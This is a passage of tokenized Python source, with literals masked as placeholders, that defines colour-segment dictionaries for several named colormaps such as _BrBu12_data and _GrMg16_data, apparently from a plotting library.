( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> 
( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> 
, <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BrBu12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> 
) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _GrMg16_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BrBu10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( 
<NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _Bu10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , 
<EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _BuDOr12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , 
<NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _StepSeq25_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _RdYlBu11b_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( 
